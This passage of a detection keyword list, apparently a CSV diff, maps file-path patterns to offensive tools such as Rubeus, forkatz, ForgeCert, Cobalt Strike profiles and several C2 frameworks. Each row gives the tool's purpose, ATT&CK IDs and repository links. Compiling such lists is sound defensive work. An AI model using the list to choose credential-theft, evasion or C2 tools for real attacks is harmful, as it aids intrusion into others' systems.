+"*/ForgeCert.git*","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z"
+"*/forkatz.filters*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z"
+"*/forkatz.git*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z"
+"*/format:hashcat*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*/FourEye.git*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z"
+"*/fox-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/fox-it/BloodHound*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z"
+"*/FreeFileSync.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","9","10","N/A","N/A","N/A","N/A"
+"*/FreeFileSync_*_Windows_Setup.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","9","10","N/A","N/A","N/A","N/A"
+"*/FreeFileSyncPortable_*.exe*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","1","N/A","9","10","N/A","N/A","N/A","N/A"
+"*/freelancer-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/Freeze.rs*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. 
direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" +"*/freyja.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*/freyja_tcp/*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*/fritzone/obfy*","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","1","N/A","N/A","6","537","123","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z" +"*/ftp-anon.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ftp-bounce.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ftp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/FtpC2/*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z" +"*/ftp-libopie.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ftp-proftpd-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ftp-syst.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ftp-vsftpd-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ftp-vuln-cve2010-4221.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Fuck-Etw.git*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*/FuckThatPacker*","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","10","10","612","91","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" +"*/FudgeC2*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration 
and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" +"*/full-nelson.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/full-nelson64*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/FunctionalC2/*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" +"*/fuzz.txt*","offensive_tool_keyword","fuzz.txt","list of sensible files for fuzzing in system","T1210 - T1190 - T1203 - T1114","TA0002 - TA0003 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Bo0oM/fuzz.txt/blob/master/fuzz.txt","1","1","N/A","N/A","10","2669","479","2023-07-20T13:26:37Z","2016-01-19T13:35:44Z" +"*/fuzzers/dns*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. 
payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/ftp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/http*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/ntp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/smb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/smtp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/ssh*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/G0ldenGunSec/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/GadgetToJScript.git*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - 
T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" +"*/gandcrab.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/ganglia-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/gather/credentials*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/gather/forensics*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/gato/*attack.py*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","1","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z" +"*/GC2-sheet/*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" +"*/gcat.git*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" +"*/gcat.py","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" +"*/geacon/*beacon*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/geacon_pro*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/Gemail-Hack.git*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","9","815","385","2022-02-18T16:12:45Z","2018-04-19T13:48:41Z" +"*/GetBrowsers.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/get-clipboard.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - 